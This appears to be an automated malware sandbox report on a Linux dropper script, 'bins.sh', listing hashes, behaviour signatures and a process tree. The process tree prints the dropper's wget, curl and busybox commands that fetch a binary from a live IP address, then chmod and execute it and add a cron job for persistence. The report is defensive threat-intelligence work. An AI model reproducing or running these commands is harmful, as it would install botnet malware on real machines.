Analysis
-
max time kernel
149s -
max time network
151s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240508-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
09-11-2024 17:37
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
9bba4ee40fc1f939fff061054cf330df
-
SHA1
f27d57c589ca7606dde15a500b6289240182abd1
-
SHA256
8aeecbca04728d12f9a2c6fc99c020f6a2a452d8818725dbcada6bc8610c85dd
-
SHA512
a58ef1fcfd72e938d3137363918dde300be1813e9ef4e9856f3bf7fb9f92590081a19bf35cd0e40952db1f607e63da93f211da11d533af8d05274007f423dee3
-
SSDEEP
192:ogNwwwYwWw1wBwRVwpAiwwwYwWw1wBwIp:ogNwwwYwWw1wBwRVwaiwwwYwWw1wBww
Malware Config
Signatures
-
Contacts a large (2202) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodpid process 1513 chmod -
Executes dropped EXE 1 IoCs
Processes:
OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlwioc pid process /tmp/OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw 1514 OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw -
Renames itself 1 IoCs
Processes:
OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlwpid process 1515 OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
crontabdescription ioc process File opened for modification /var/spool/cron/crontabs/tmp.MeOfSA crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Processes:
OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlwdescription ioc process File opened for reading /proc/565/cmdline OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw File opened for reading /proc/1576/cmdline OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw File opened for reading /proc/1614/cmdline OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw File opened for reading /proc/1651/cmdline OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw File opened for reading /proc/1732/cmdline OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw File opened for reading /proc/89/cmdline OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw File opened for reading /proc/1627/cmdline OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw File opened for reading /proc/1750/cmdline OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw File opened for reading /proc/80/cmdline OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw File opened for reading /proc/450/cmdline OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw File opened for reading /proc/1713/cmdline OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw File opened for reading /proc/173/cmdline OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw File opened for reading /proc/750/cmdline OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw File opened for reading /proc/1021/cmdline OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw File opened for reading /proc/1586/cmdline OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw File opened for reading /proc/1706/cmdline OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw File opened for reading /proc/1709/cmdline OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw File opened for reading /proc/1499/cmdline OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw File opened for reading /proc/1554/cmdline OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw File opened for reading /proc/1565/cmdline OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw File opened for reading /proc/1648/cmdline OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw File opened for reading /proc/542/cmdline OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw File opened for reading /proc/1714/cmdline OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw File opened for reading /proc/1743/cmdline OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw File opened for reading /proc/1779/cmdline OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw File opened for reading /proc/1584/cmdline OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw File opened for reading /proc/1645/cmdline OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw File opened for reading /proc/1687/cmdline OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw File opened for reading /proc/1759/cmdline OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw File opened for reading /proc/4/cmdline OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw File opened for reading /proc/1570/cmdline OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw File opened for reading /proc/1746/cmdline OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw File opened for reading /proc/1591/cmdline OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw File opened for reading /proc/1682/cmdline OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw File opened for reading /proc/1769/cmdline OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw File opened for reading /proc/1144/cmdline OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw File opened for reading /proc/1149/cmdline OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw File opened for reading /proc/1595/cmdline OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw File opened for reading /proc/1728/cmdline OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw File opened for reading /proc/435/cmdline OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw File opened for reading /proc/1091/cmdline OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw File opened for reading /proc/1688/cmdline OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw File opened for reading /proc/1533/cmdline OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw File opened for reading /proc/1572/cmdline OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw File opened for reading /proc/25/cmdline OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw File opened for reading /proc/1119/cmdline OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw File opened for reading /proc/1169/cmdline OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw File opened for reading /proc/1180/cmdline OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw File opened for reading /proc/1296/cmdline OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw File opened for reading /proc/1527/cmdline OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw File opened for reading /proc/1676/cmdline OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw File opened for reading /proc/1786/cmdline OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw File opened for reading /proc/534/cmdline OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw File opened for reading /proc/1528/cmdline OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw File opened for reading /proc/1546/cmdline OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw File opened for reading /proc/1561/cmdline OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw File opened for reading /proc/1659/cmdline OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw File opened for reading /proc/1753/cmdline OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw File opened for reading /proc/78/cmdline OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw File opened for reading /proc/1501/cmdline OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw File opened for reading /proc/1521/cmdline OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw File opened for reading /proc/1569/cmdline OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw File opened for reading /proc/1608/cmdline OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw File opened for reading /proc/1821/cmdline OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw -
Writes file to tmp directory 4 IoCs
Malware often drops required files in the /tmp directory.
Processes:
wgetcurlbusyboxwgetdescription ioc process File opened for modification /tmp/OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw wget File opened for modification /tmp/OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw curl File opened for modification /tmp/OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw busybox File opened for modification /tmp/aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s0 wget
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:1505
-
/bin/rm/bin/rm bins.sh2⤵PID:1506
-
/usr/bin/wgetwget http://216.126.231.240/bins/OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw2⤵
- Writes file to tmp directory
PID:1507 -
/usr/bin/curlcurl -O http://216.126.231.240/bins/OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw2⤵
- Writes file to tmp directory
PID:1511 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw2⤵
- Writes file to tmp directory
PID:1512 -
/bin/chmodchmod 777 OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw2⤵
- File and Directory Permissions Modification
PID:1513 -
/tmp/OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw./OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw2⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:1514 -
/bin/shsh -c "crontab -l"3⤵PID:1516
-
/usr/bin/crontabcrontab -l4⤵PID:1517
-
/bin/shsh -c "crontab -"3⤵PID:1518
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:1519 -
/bin/rmrm OfZeLov89tJZDz5lr6ihWtsp2Idr9Wowlw2⤵PID:1521
-
/usr/bin/wgetwget http://216.126.231.240/bins/aFX7z8gPEa8M9Y5OTgK952S1YHYCS9J8s02⤵
- Writes file to tmp directory
PID:1524
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
112KB
MD505d7857dcead18bbd86d2935f591873c
SHA134d18f41ef35f93d5364ce3e24d74730a4e91985
SHA2562cb1fa4742268fb0196613aee7a39a08a0707b3ef8853280d5060c44f3650d70
SHA512d1793861067758a064ac1d59c80c78f9cb4b64dd680ab4a62dd050156dc0318dde590c7b44c1184c9ee926f73c3fc242662e42645faab6685ecef9d238d2e53e
-
Filesize
12KB
MD56cae463fe7614c039bf68a1e612c159b
SHA14af7634363bcc026529fa68c8bebb399b268ba0d
SHA2568b385d231f7a59f73af89fc544af19c802e2e932cdc4c8eca473ea313c765b00
SHA512a7cc4c48aae0f9cb0d52f179d9638b440d68975d6758ddfc90bdfa04d58218110eb63cda835170cf3a9b0d36e0c8209da7ece6528ae15529288b155622109be1
-
Filesize
210B
MD5d64dad17ec25f656980958e750ef4f6b
SHA1c15dd758761f96a75dc39f2da2c84e225cf00273
SHA256540358ffe1a0161e8742ce4795b602c807de66501382dc9569874e34984443cd
SHA512871ea19052ee74a4de0a656f68ea9f55af88f82f1d2bf104d5a8b4d05ff18c97adc26056e9c3d6525187ad8e83f79198d41d263d41aa96df831fd08d7e2d4bc5